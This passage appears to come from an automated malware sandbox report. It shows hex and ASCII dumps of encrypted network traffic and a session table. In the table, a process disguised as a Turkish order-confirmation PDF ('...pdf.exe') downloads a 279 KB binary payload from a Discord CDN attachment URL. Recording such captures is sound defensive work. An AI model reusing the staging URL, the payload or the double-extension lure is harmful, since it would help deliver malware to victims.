                                2022-06-26 07:42:48 UTC42INData Raw: 7b 0d a6 8e da da 5c 98 01 21 da da 25 35 25 25 50 41 8d e0 dc 25 25 68 60 0f d8 da da 75 66 60 f5 21 da da 75 0d 9a d7 da da 60 e5 50 fe 8d e0 dc 25 25 68 60 0f d8 da da 75 7c 8d 0b 1c 25 75 0d c9 d7 da da 66 eb 0d 68 da da da 64 20 19 c6 e4 06 90 f5 21 da da 64 50 19 68 60 0f d8 da da d7 81 0d b7 33 25 25 66 f5 67 68 60 ca 23 da da 94 29 dc 25 25 0d 22 ae da da dd 09 d7 65 25 64 20 21 dd 09 d7 65 25 64 20 1d 66 9e 66 f0 d5 4a 65 25 0d 53 a9 da da a9 e5 99 04 66 1e 29 0d fb b7 da da 64 20 21 66 20 21 0d c6 f7 da da 60 e5 99 37 66 30 21 a5 a1 27 da 53 99 2d dd 0d d7 65 25 64 20 1d 8d 25 dc 25 25 68 60 0f 21 da da 75 7c 5d f5 1c 25 66 65 29 75 7c 8d 0b 1c 25 0d d3 7c da da 75 0d 75 8e da da 68 70 c9 d6 da da 66 de 0d 8a 5c da da 68 60 c9 d6 da da 64 60 c9
                                Data Ascii: {\!%5%%PA%%h`uf`!u`P%%h`u|%ufhd !dPh`3%%fgh`#)%%"e%d !e%d ffJe%Sf)d !f !`7f0!'S-e%d %%%h`!u|]%fe)u|%|uuhpf\h`d`
                                2022-06-26 07:42:48 UTC44INData Raw: da da 66 20 21 64 20 09 eb 20 0d e6 64 50 11 eb 20 15 e6 64 58 19 eb 20 1d 25 68 20 09 75 8f 27 68 30 05 7c 0d aa 1c 25 0d f2 cd da da 66 28 05 d7 dc 7c fd 52 65 25 0d 11 21 da da 66 fd 0e e5 7f 34 34 89 64 35 8d 06 92 65 25 68 20 05 0d e8 64 da da 68 20 21 0d e0 64 da da 9e c4 36 a7 da da c6 0d 66 9e 3a 83 36 66 c0 38 9e 64 f1 64 39 49 66 48 25 c4 56 a7 da da 9e 66 e5 30 66 11 0d 61 da da da 68 28 2d 5e 9c 29 66 30 2d 0d ff da da da 38 e7 29 25 66 e5 66 e8 e1 f3 1c 25 d7 dc 7c 5d 9d 65 25 0d 23 21 da da 0d 20 a7 da da 9e 66 25 18 b7 25 25 e5 5a 51 99 34 18 b3 25 25 e5 5a f0 99 2e 08 e0 25 25 e5 99 30 08 62 25 25 25 99 61 6d 99 6d c6 30 e0 4c da da 1a 5e 0d 27 97 0e 99 12 c6 22 18 bb 25 25 e5 5a ec 99 10 08 6e 25 25 e5 99 4d 6d 99 ee 6d 99 3b c6 0a 08 d8
                                Data Ascii: f !d dP dX %h u'h0|%f(|Re%!f44d5e%h dh !d6f:6f8dd9IfH%Vf0fah(-^)f0-8)%ff%|]e%#! f%%%ZQ4%%Z.%%0b%%%amm0L^'"%%Zn%%Mmm;
                                2022-06-26 07:42:48 UTC45INData Raw: 94 a5 25 25 25 0d 48 ab da da 5c e9 b9 25 25 25 9e 66 e5 7b 32 66 1f 0e f7 60 e5 99 8b a5 61 5d 25 99 85 60 da 50 39 af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 71 d7 dc c6 6d 66 d2 73 c6 dc 73 60 1b a1 37 af 31 55 5c bc da 25 25 25 ea 7e e8 3d 9c 1c 25 97 c4 66 aa 06 f3 5c bc dc 25 25 a5 54 e0 24 5e a4 23 1c 60 a4 50 29 d7 27 c6 ee af 29 5d 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 27 d7 dc 66 e7 3a 83 9e 68 65 25 2e 7b 66 17 66 fd 0e e5 a5 18 79 c2 1c 25 25 99 ea 66 9e 0d 49 ad da da 66 fb 6f 0d 8d da da da 83 36 9e b5 0e a4 a5 18 79 c2 1c 25 25 99 e2 0d 79 da da da 66 ed 66 9c 9e 68 65 25 2e 7b 66 17 66 fd 66 9e 0d ce 60 da da 16 15 a3 e4 66 9e 0d 0d 60 da da 66 15 66 fb 66 9e 0d e0 25 25 25 83 36 9e 66 e5 2e 7b 32 30 66 1f 66 15 0e c8 60 da a3 6b 66 eb
                                Data Ascii: %%%H\%%%f{2f`a]%`P9%%%%~=%Nqmfss`71U\%%%~=%f\%%T$^#`P)')]%%%~=%N'f:he%.{ffy%%fIfo6y%%yffhe%.{fff`f`fff%%%6f.{20ff`kf
                                2022-06-26 07:42:48 UTC46INData Raw: 7c 6d c2 1c 25 0d 99 da da da 75 0d 9b c7 da da 0e 1b c6 04 af 69 12 2b af 81 12 e2 4f fd 97 3f 1e ad 20 da af 20 da 00 da 25 25 25 ea 86 e0 3d 9c 1c 25 23 20 da 23 a6 50 0f 5e eb 27 5e 23 31 58 2f af 69 12 2b 2f 69 12 e2 50 ed 3a 83 36 34 38 9e 7c 71 c2 1c 25 5e 1d fa 52 e2 ea 7e e0 35 9e 1c 25 ea b7 e5 9e 68 65 25 30 66 11 5c e9 89 23 da da 2e 7b 32 a2 e0 6d c2 1c 25 e4 29 25 25 a2 e0 71 c2 1c 25 e4 25 25 25 a2 e0 75 c2 1c 25 dc 25 25 25 0d 48 c7 da da 60 e5 99 e0 7e 6d c2 1c 25 8b 60 e5 99 f6 66 f5 8b 5c 07 da de ea 92 f7 64 f0 71 c2 1c 25 ea 92 e5 9c 0d 2f 7e 75 c2 1c 25 e3 61 9e 65 25 9a 3d 9c 1c 25 94 2d 25 25 25 ce 80 5e 18 f5 e5 1c 25 27 ea 60 88 25 25 25 0d 48 da da da a9 e5 99 ee eb e0 30 c2 1c 25 25 eb e0 79 c2 1c 25 25 c4 9a 25 25 25 30 0d 15
                                Data Ascii: |m%ui+O? %%%=%# #P^'^#1X/i+/iP:648|q%^R~5%he%0f\#.{2m%)%%q%%%%u%%%%H`~m%`f\dq%/~u%ae%=%-%%%^%'`%%%H0%%y%%%%%0
                                2022-06-26 07:42:48 UTC48INData Raw: 25 da 00 59 ce 1c 25 66 e5 30 66 11 5e e9 11 2e 0e e5 64 20 11 0e e5 30 8d 91 a2 65 25 89 da 55 89 64 45 0d 20 78 da da 66 fd 60 b6 99 12 64 38 15 eb 20 19 25 68 30 11 66 9e 0d af 09 da da 66 20 11 64 20 1d eb 20 21 e6 68 20 15 75 8f dc 66 e8 cd aa 1c 25 d7 dc 7c 15 9d 65 25 0d 9d c8 da da 66 f5 c6 39 66 e8 45 f5 1c 25 d7 dc 7c 15 9d 65 25 0d 4b c8 da da 66 f5 64 7f 31 66 e7 0d 8b 97 da da 0e e5 7f 34 34 89 64 35 8d 4e a2 65 25 68 20 11 0d 98 9d da da 9e c4 ee 97 da da c6 15 36 66 c0 38 9e 2e 66 fd 60 b6 50 e0 0d 7d da da da 66 9e 36 9e 2e 7b 2c 96 39 9e 1c 25 66 19 c6 3b 66 de 64 2b 66 2b 66 25 64 de df 2d 25 25 25 66 2b 0d 5f 87 da da 5e 16 25 50 c0 7f 83 36 9e b5 2e 8d 11 a2 65 25 0d 7c c1 da da 66 fd 60 b6 99 35 8d 21 a2 65 25 2e 0d bd c1 da da 7e 61
                                Data Ascii: %Y%f0f^.d 0e%UdE xf`d8 %h0ff d !h uf%|e%f9fE%|e%Kfd1f44d5Ne%h 6f8.f`P}f6.{,9%f;fd+f+f%d-%%%f+_^%P6.e%|f`5!e%.~a
                                2022-06-26 07:42:48 UTC49INData Raw: da da 66 29 49 da 6d 31 66 29 49 5e 9d 31 25 50 6d 66 f9 66 1e 45 0d e4 d8 da da 0d e9 72 da da 16 1e 49 99 59 68 1e 31 0d 92 d6 da da 66 ed 5c d4 da da 25 25 50 e4 66 9e 0d 43 23 da da c6 f4 60 a4 5a f0 66 9c 94 da da 25 25 74 d2 d4 60 f7 50 e2 66 9e 0d de 23 da da 7f 36 9e 66 35 0e a4 64 2d 66 e7 0d e2 8d da da 9e 66 e5 30 66 11 5e e9 19 2e 66 fd 77 0d 2c bd da da 64 20 19 0e e5 30 8d 2f a8 65 25 89 da 55 89 64 45 b4 58 23 0e e5 30 8d 11 f1 65 25 89 da 55 89 64 45 66 9e 0d 3d 9d da da 75 0d ef 72 da da 64 20 1d 0e e5 7f 34 34 89 64 35 8d ce f1 65 25 b6 07 b4 48 23 9e c4 6e 91 da da c6 ce 0e e5 7f 34 34 89 64 35 8d ec a8 65 25 66 20 19 75 0d ca 72 da da 9e c4 50 91 da da c6 ca 66 20 1d 36 66 c0 38 9e 68 65 25 f8 25 25 25 31 9e 1c 25 b1 aa 1c 25 29 9e 1c
                                Data Ascii: f)Im1f)I^1%PmffErIYh1f\%%PfC#`Zf%%t`Pf#6f5d-ff0f^.fw,d 0/e%UdEX#0e%UdEf=urd 44d5e%H#n44d5e%f urPf 6f8he%%%%1%%)
                                2022-06-26 07:42:48 UTC50INData Raw: 65 dd 41 a8 65 25 0d 45 91 da da dd 2d f3 65 25 0d 63 91 da da a5 18 40 0b 1c 25 25 99 ea dd 5d 9c 1c 25 df 0d ac 65 25 0d ef 93 da da 0d e4 c4 da da 0d 2d 0f da da 0d ce d0 da da 0d bb cc da da 0e e5 7f 34 34 89 64 35 8d b6 ac 65 25 9e c4 86 42 da da c6 1d 38 9e 25 25 25 da da da da 27 25 25 25 55 9d 25 25 2e 7b 66 17 66 fd 16 ce 58 33 66 9e 06 eb 0d b4 81 da da de eb 83 36 9e 66 eb 06 9e 0d a6 81 da da de 9e 83 36 9e 66 e5 30 66 11 0e e5 30 8d 14 f7 65 25 89 da 55 89 64 45 da e0 cd c2 1c 25 0e e5 7f 34 34 89 64 35 8d 65 f7 65 25 9e c4 6b 42 da da c6 1d 38 9e 66 e5 5e 08 cd c2 1c 25 dc 9e 30 66 11 0e e5 30 8d 4c f7 65 25 89 da 55 89 64 45 da e0 d1 c2 1c 25 0e e5 7f 34 34 89 64 35 8d 9d f7 65 25 9e c4 33 42 da da c6 1d 38 9e 66 e5 5e 08 d1 c2 1c 25 dc 9e
                                Data Ascii: eAe%E-e%c@%%]%e%-44d5e%B8%%%'%%%U%%.{ffX3f6f6f0f0e%UdE%44d5ee%kB8f^%0f0Le%UdE%44d5e%3B8f^%
                                2022-06-26 07:42:48 UTC52INData Raw: 15 66 9e 36 34 38 e7 35 25 b5 da 00 6d ce 1c 25 66 e5 da 00 69 ce 1c 25 66 e5 da 00 65 ce 1c 25 66 e5 da 00 61 ce 1c 25 66 e5 30 66 11 2c 2e 7b 66 ff 66 15 64 38 21 66 20 2d 5e 9d 21 25 99 f4 7b 66 20 2d 66 65 21 75 0d 18 68 da da 64 20 21 5e 58 21 25 50 de 64 38 21 66 20 21 83 36 34 38 9e b5 30 66 11 2c 8d 5d b4 65 25 0d 37 68 da da 64 20 21 30 df c9 f7 65 25 dd 6d b4 65 25 0d 82 da da da 34 7e d5 c2 1c 25 30 df f9 f7 65 25 dd 81 b4 65 25 0d 6c da da da 34 7e d9 c2 1c 25 30 df f9 f7 65 25 dd 89 b4 65 25 0d 56 da da da 34 7e dd c2 1c 25 30 df 05 f7 65 25 dd 91 b4 65 25 0d 40 da da da 34 7e e1 c2 1c 25 30 df 05 f7 65 25 dd 99 b4 65 25 0d 2a da da da 34 7e e5 c2 1c 25 30 df 05 f7 65 25 dd a1 b4 65 25 0d 14 da da da 34 7e e9 c2 1c 25 30 df 05 f7 65 25 dd a9
                                Data Ascii: f6485%m%fi%fe%fa%f0f,.{ffd8!f -^!%{f -fe!uhd !^X!%Pd8!f !6480f,]e%7hd !0e%me%4~%0e%e%l4~%0e%e%V4~%0e%e%@4~%0e%e%*4~%0e%e%4~%0e%
                                2022-06-26 07:42:48 UTC53INData Raw: 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 79 54 95 40 1e 3c 4e 99 20 97 97 4a 97 66 e5 e1 01 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 e1 01 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 2a 9b 40 97 8b 91 4a 52 20 97 97 4a 97 66 e5 45 b8 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 45 b8 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f2 20 7b 3c 97 44 3c 93 99 24 93 9b 3c 91 44 89 1c 97 42 20 97 97
                                Data Ascii: %[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<yT@<N Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<*@JR JfEe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Ee%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<$<DB


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                1 | 192.168.2.3 | 49719 | 162.159.130.233 | 443 | C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                Timestamp | kBytes transferred | Direction | Data
                                2022-06-26 07:42:48 UTC | 57 | OUT | GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1
                                User-Agent: 21
                                Host: cdn.discordapp.com
                                Cache-Control: no-cache
                                2022-06-26 07:42:48 UTC | 57 | IN | HTTP/1.1 200 OK
                                Date: Sun, 26 Jun 2022 07:42:48 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 279040
                                Connection: close
                                CF-Ray: 72144ef0eddbbb95-FRA
                                Accept-Ranges: bytes
                                Cache-Control: public, max-age=31536000
                                Content-Disposition: attachment;%20filename=Eluiezilfwmdrgrdfrqpnwmurrnwnhm
                                ETag: "7d74af495b07aad93486870343b767e3"
                                Expires: Mon, 26 Jun 2023 07:42:48 GMT
                                Last-Modified: Sun, 26 Jun 2022 05:30:40 GMT
                                Vary: Accept-Encoding
                                CF-Cache-Status: MISS
                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                x-goog-generation: 1656221440589477
                                x-goog-hash: crc32c=Xt3y7g==
                                x-goog-hash: md5=fXSvSVsHqtk0hocDQ7dn4w==
                                x-goog-metageneration: 1
                                x-goog-storage-class: STANDARD
                                x-goog-stored-content-encoding: identity
                                x-goog-stored-content-length: 279040
                                X-GUploader-UploadID: ADPycdvxBSrtOJadICrFNKKLfO89NiJC2XolLUl9l7gh0iKGSgrZ72iFb7WGAL9LAxlO6pTzoCsdjuJYzhz5OOHW7aIxBA
                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b6QKg3CSTE%2B519lp1p3v10r2uF4jcCWfiuHvEH%2BIvZtI9%2FyN8BLBAVUiP1VZglETdO9O81AT2sJY0zJo5Q7E9QyKCBFtp8s1QcgluhsHquUIFJ6tKzZSzfdsn1fhf3OUfO2EqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                2022-06-26 07:42:48 UTC59INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                2022-06-26 07:42:48 UTC59INData Raw: 28 7f b5 25 de 25 25 25 29 25 25 25 da da 25 25 dd 25 25 25 25 25 25 25 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 dc 25 25 33 fa df 33 25 d9 e4 a8 fc dd dc 71 a8 fc 79 8d 44 4e 45 95 97 4a 42 97 3c 48 45 3e 3c 93 93 4a 99 45 87 40 45 97 50 93 45 44 93 45 69 2a 2e 45 48 4a 89 40 53 e8 e8 2f 49 25 25 25 25 25 25 25 19 fb 3d ab d5 92 9b b0 d5 92 9b b0 d5 92 9b b0 0e 86 9d b0 92 92 9b b0 ba cd 58 b0 8e 92 9b b0 ba cd a1 b0 96 92 9b b0 ba cd 97 b0 d7 92 9b b0 63 9a 04 b0 90 92 9b b0 7d cd 58 b0 8e 92 9b b0 63 9a 3b b0 8c 92 9b b0 d5 92 52 b0 a5 db 9b b0 0e 9a 06 b0 7e 92 9b b0 ab 6c 58 b0 47 92 9b b0 ab 6c a1 b0 8c 92 9b b0 86 4f 01 b0 d9 92 9b b0 52 8c 95 b0 8c 92 9b b0 77 44 3e 8d d5 92 9b
                                Data Ascii: (%%%%)%%%%%%%%%%%%e%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%33%qyDNEJB<HE><JE@EPEDEi*.EHJ@S/I%%%%%%%=Xc}Xc;R~lXGlORwD>
                                2022-06-26 07:42:48 UTC60INData Raw: 59 65 25 ec 79 24 93 99 40 97 8b 3c 3e 40 89 2a 87 8f 40 3e 99 66 e5 da 00 b5 cc 1c 25 66 e5 da 00 b1 cc 1c 25 66 e5 da 00 ad cc 1c 25 66 e5 da 00 a9 cc 1c 25 66 e5 da 00 a5 cc 1c 25 66 e5 da 00 c9 cc 1c 25 66 e5 da 00 a1 cc 1c 25 66 e5 da 00 c5 cc 1c 25 66 e5 da 00 9d cc 1c 25 66 e5 da 00 99 cc 1c 25 66 e5 da 00 95 cc 1c 25 66 e5 da 00 91 cc 1c 25 66 e5 da 00 8d cc 1c 25 66 e5 da 00 89 cc 1c 25 66 e5 da 00 85 cc 1c 25 66 e5 da 00 81 cc 1c 25 66 e5 da 00 7d cc 1c 25 66 e5 da 00 79 cc 1c 25 66 e5 da 00 75 cc 1c 25 66 e5 da 00 c1 cc 1c 25 66 e5 da 00 71 cc 1c 25 66 e5 da 00 6d cc 1c 25 66 e5 da 00 69 cc 1c 25 66 e5 da 00 d9 cc 1c 25 66 e5 da 00 d5 cc 1c 25 66 e5 da 00 d1 cc 1c 25 66 e5 da 00 65 cc 1c 25 66 e5 da 00 61 cc 1c 25 66 e5 da 00 e9 cc 1c 25 66 e5
                                Data Ascii: Ye%y$@<>@*@>f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f}%fy%fu%f%fq%fm%fi%f%f%f%fe%fa%f%f
                                2022-06-26 07:42:48 UTC61INData Raw: 25 66 2b 66 65 2d 75 0d 3b 21 da da 60 e5 50 2f a2 e0 ed c0 1c 25 dc 25 25 25 66 2b 0d ec d8 da da 66 69 49 29 64 2b dd 11 c0 1c 25 16 2b 50 b1 0e e5 64 e2 5e a1 49 31 25 99 ec 66 69 49 2d 64 e2 66 69 49 31 06 69 49 2d 64 22 29 5e e9 3d 38 3a 83 36 9e 66 e5 2e 7b 32 30 5e e9 0d 66 b4 64 39 49 68 99 49 2d 68 a1 49 29 68 91 49 31 66 f5 66 ef 5c bc 25 15 da da 64 71 49 35 de 39 49 5c e7 da ea 25 25 5c 07 25 15 da da 64 79 49 39 66 69 49 35 64 de 66 69 49 39 06 69 49 35 64 1e 29 7c 11 c0 1c 25 64 e2 c6 36 66 e2 66 65 2d 64 2b 66 e2 66 65 31 de 2b 64 20 25 66 2b 16 69 49 35 4e 2b 66 69 49 35 64 2b 66 20 25 16 69 49 39 9b e2 66 69 49 39 64 20 25 66 2b 16 20 25 4e fa 8f 29 8d 25 35 25 25 66 20 25 06 2b 75 66 2b 75 0d 4b d6 da da 60 e5 50 2b 0e e5 64 de c6 ea 66
                                Data Ascii: %f+fe-u;!`P/%%%%f+fiI)d+%+Pd^I1%fiI-dfiI1iI-d")^=8:6f.{20^fd9IhI-hI)hI1ff\%dqI59I\%%\%dyI9fiI5dfiI9iI5d)|%d6ffe-d+ffe1+d %f+iI5N+fiI5d+f %iI9fiI9d %f+ %N)%5%%f %+uf+uK`P+df
                                2022-06-26 07:42:48 UTC63INData Raw: 0d f9 1b da da eb e0 e9 c0 1c 25 25 7c 49 0b 1c 25 75 0d c7 1b da da 0e e5 7e 49 0b 1c 25 7c 11 c0 1c 25 64 20 1d c6 f6 8d 25 a5 25 25 8f 25 66 20 1d 66 65 2d 75 0d b3 1b da da 66 20 1d 66 25 64 20 1d dd 11 c0 1c 25 16 20 1d 50 b6 dd 11 c0 1c 25 0d 43 d2 da da dd 21 c0 1c 25 0d 39 d2 da da dd 4d 0b 1c 25 0d 2f d2 da da 7c 09 c0 1c 25 64 20 21 5e 58 21 25 99 fc 66 20 21 66 25 7e 09 c0 1c 25 66 20 21 75 0d 08 1b da da 7c 09 c0 1c 25 64 20 21 5e 58 21 25 50 ba 0e e5 7f 34 34 89 64 35 8d b2 41 65 25 a5 18 28 05 1c 25 25 99 2f 8d f1 c0 1c 25 0d 02 1b da da 8d f1 c0 1c 25 0d 00 1b da da 9e c4 8a 41 25 25 c6 b6 34 34 38 9e b5 2e 5e e9 1d 16 e0 3d 0b 1c 25 50 e4 66 75 29 64 f0 3d 0b 1c 25 66 75 29 64 39 49 66 75 2d 5c 1f 25 35 25 25 5a 73 16 29 49 50 f2 60 f7 54
                                Data Ascii: %%|I%u~I%|%d %%%%f fe-uf f%d % P%C!%9M%/|%d !^X!%f !f%~%f !u|%d !^X!%P44d5Ae%(%%/%%A%%448.^=%Pfu)d=%fu)d9Ifu-\%5%%Zs)IP`T
                                2022-06-26 07:42:48 UTC64INData Raw: 29 66 e2 7e 45 0b 1c 25 66 22 29 7e 41 0b 1c 25 d5 dc 5e e9 35 3a 83 36 9e 68 65 25 2e 5e e9 1d 66 fd 66 f9 68 1e 29 0d 19 1b da da 5e 61 49 25 99 e6 66 e9 0d 32 da da da a9 e5 50 29 0e e5 c6 27 d5 dc 34 7f 36 9e b5 2e 7b 5e e9 1d 66 17 66 fd 66 f1 68 7b 29 66 9e 0d 46 d2 da da 5e 61 49 25 99 e6 66 e9 0d 4b da da da a9 e5 50 29 0e e5 c6 27 d5 dc 34 7f 83 36 9e 68 65 25 2c 66 f9 0e a4 64 2f 60 e5 54 de 5e e5 de 9c 1d 27 18 25 29 25 25 5a f4 66 e8 49 0b 1c 25 66 71 5c 19 64 2f 5e 5f 25 50 2d 65 18 dc 29 25 25 50 c2 66 27 7f 9e 68 65 25 2e 7b 32 30 5e e9 19 66 fd 68 99 49 2d 9a 3d 0b 1c 25 98 41 0b 1c 25 7c 35 0b 1c 25 64 2b 66 2b 16 7d 2d ea b3 86 25 25 25 66 e2 64 2b 66 2b 66 65 2d 16 fd ea b3 bf 25 25 25 66 3b 64 7f 2d 66 3b 66 77 29 64 3b 66 3b 16 7f 2d
                                Data Ascii: )f~E%f")~A%^5:6he%.^ffh)^aI%f2P)'46.{^fffh{)fF^aI%fKP)'46he%,fd/`T^'%)%%ZfI%fq\d/^_%P-e)%%Pf'he%.{20^fhI-=%A%|5%d+f+}-%%%fd+f+fe-%%%f;d-f;fw)d;f;-
                                2022-06-26 07:42:48 UTC65INData Raw: 65 25 a5 18 28 05 1c 25 25 99 2f 8d f1 c0 1c 25 0d 3f 11 da da 9e c4 d1 37 25 25 c6 c0 66 20 21 36 66 c0 38 9e 66 e5 2e 7b 32 30 5e e9 19 66 ff 5e 9e e2 5e be 21 5e d6 31 58 e0 96 31 25 25 25 5e 0d 29 64 29 49 66 29 49 66 55 5c 0b 21 da da 5a 66 29 49 de eb 64 69 49 29 16 ce 50 e2 d5 dc c4 98 dc 25 25 16 ce ea b3 b5 25 25 25 66 13 06 c6 66 79 49 29 16 f0 45 0b 1c 25 50 51 04 08 45 0b 1c 25 dc 08 41 0b 1c 25 5e 18 41 0b 1c 25 31 ea 68 4a dc 25 25 dc 08 45 0b 1c 25 04 08 41 0b 1c 25 66 03 c4 81 dc 25 25 64 69 49 29 66 69 49 29 1b 25 27 50 3d 66 69 49 29 64 69 49 2d 66 69 49 2d de 8d 2d 66 69 49 2d 0d 2c d0 da da 5e d8 31 a1 fe 66 29 49 de 9e 64 69 49 29 5e a8 27 66 69 49 29 64 4d 66 69 49 29 5e e5 29 0d 67 1b da da c4 ea dc 25 25 66 03 c4 2d dc 25 25 66 d6
                                Data Ascii: e%(%%/%?7%%f !6f8f.{20^f^^!^1X1%%%^)d)If)IfU\!Zf)IdiI)P%%%%%ffyI)E%PQE%A%^A%1hJ%%E%A%f%%diI)fiI)%'P=fiI)diI-fiI--fiI-,^1f)IdiI)^'fiI)dMfiI)^)g%%f-%%f
                                2022-06-26 07:42:48 UTC67INData Raw: 2b a5 5d 47 50 e8 66 2b a5 9d dc 47 50 e0 5e 2b 27 c6 ba 0e c8 66 2b 64 69 49 31 c6 36 66 2b a5 5d 47 50 65 66 2b 75 0d 7b c0 da da 64 2b c6 39 66 2b 75 0d 6f c0 da da 64 e2 66 e2 06 2b de 0d 66 e2 64 2b 66 2b af 3d a9 b6 99 e0 a5 d6 47 50 ba 66 2b a5 5d 25 99 45 66 2b 75 0d 47 c0 da da 64 2b c6 39 66 2b 75 0d 3b c0 da da 64 e2 66 e2 06 2b de 0d 66 e2 64 2b 66 2b a5 5d 45 52 c3 66 69 49 29 66 b0 0d 9d f4 25 25 66 69 49 31 64 2b 66 69 49 29 66 25 64 69 49 35 0e c8 c6 56 66 2b a5 5d 47 50 75 66 2b 75 0d b0 09 da da 64 2b c6 49 66 2b 75 0d a4 09 da da 64 e2 66 2b 16 e2 4e 39 66 2b af 25 66 79 49 35 ad 29 4f da 2b 20 66 2b 16 e2 97 11 66 2b af 3d a9 b6 99 e0 a5 d6 47 50 aa 66 2b a5 5d 25 99 55 66 2b 75 0d 6c 09 da da 64 2b c6 49 66 2b 75 0d 60 09 da da 64 e2
                                Data Ascii: +]GPf+GP^+'f+diI16f+]GPef+u{d+9f+uodf+fd+f+=GPf+]%Ef+uGd+9f+u;df+fd+f+]ERfiI)f%%fiI1d+fiI)f%diI5Vf+]GPuf+ud+If+udf+N9f+%fyI5)O+ f+f+=GPf+]%Uf+uld+If+u`d
                                2022-06-26 07:42:48 UTC68INData Raw: 59 65 25 25 25 a0 53 e1 c7 8c 12 65 25 25 65 9b 5f 46 e6 03 5f 65 25 25 0d 64 29 fe a2 af 63 65 25 25 87 d1 a0 c6 9d 88 1c 65 25 a5 9f f2 92 4b b2 fd 69 65 25 b5 d1 93 57 9d ab 62 6d 65 25 d9 32 2f 1a 3b 8d 84 26 65 25 7c c8 f1 f3 f6 e7 ae 73 65 c5 a9 39 65 3c 2c 34 a9 77 65 ed 80 f4 b5 94 80 4a 80 30 65 5f ea 45 19 02 6a a6 f3 7d 65 a9 e4 b9 1d 9d 14 1a 5c 81 65 c0 e6 94 5b b2 e2 6a 7c 3a 65 ba 73 42 29 a8 a4 17 a4 87 65 bb 47 5c 20 65 a1 4a 21 40 65 c3 90 95 06 cd 88 a0 78 44 65 b0 cb aa da 24 fa 9d e7 ae 65 7e 39 76 a0 3b 86 8e ca 18 1c 05 b1 c4 a5 a4 22 df 6e cd 1c cf f2 0b 5a 06 7c 3b db 37 67 46 30 02 14 68 d2 95 05 a1 67 55 a4 61 be da bb 77 af c2 67 b3 03 d4 78 d6 c6 a3 cf 2c 1e b1 0a 8f 81 f4 21 4b f7 96 1e 9b be f1 17 04 0a a9 5c 4b 69 f7 2f b5
                                Data Ascii: Ye%%%Se%%e_F_e%%d)ce%%e%Kie%Wbme%2/;&e%|se9e<,4weJ0e_Ej}e\e[j|:esB)eG\ eJ!@exDe$e~9v;"nZ|;7gF0hgUawgx,!K\Ki/
                                2022-06-26 07:42:48 UTC69INData Raw: 7b 8b 66 57 8b e4 1b 99 f2 8b 5c 23 25 e5 4e 35 75 66 25 0d 9d da da da 7d 99 e0 64 cc 83 da bc 83 66 2d da 3c 15 9e b5 77 2c 2e a9 f7 a1 de da 75 19 0c f7 68 71 49 35 89 66 3f 64 f4 64 44 2d a2 1c 29 f4 12 65 25 64 1c 31 89 64 2f 36 34 7f 9e c4 5f dc 25 25 66 69 49 51 66 65 31 60 e5 99 33 66 2d d7 5c 75 da 2c 21 7d 0d e4 25 25 25 0d cd 27 25 25 9e 68 65 25 66 35 da 77 1d 9e 66 e5 2e 66 fd 66 9e 66 35 da 77 09 66 9e 36 9e 66 e5 a9 f7 5a dc 9e 75 77 66 35 da 77 0d 7f 7d 9e b5 a5 18 4d e5 1c 25 dc 9b ec 8f 25 8f 25 8f 25 8d ba 1f c8 33 da f0 39 05 1c 25 9e b5 a5 18 4d e5 1c 25 25 99 f2 75 75 77 79 8f 27 8f 25 8d 09 1f c8 33 da f0 39 05 1c 25 5e e9 2d 7d 9e 68 65 25 79 8f dc 8f 25 8d 05 1f c8 33 da f0 39 05 1c 25 5e e9 29 7d 9e 68 65 25 a5 18 4d e5 1c 25 dc
                                Data Ascii: {fW\#%N5uf%}df-<w,.uhqI5f?ddD-)e%d1d/64_%%fiIQfe1`3f-\u,!}%%%'%%he%f5wf.fff5wf6fZuwf5w}M%%%%39%M%%uuwy'%39%^-}he%y%39%^)}he%M%
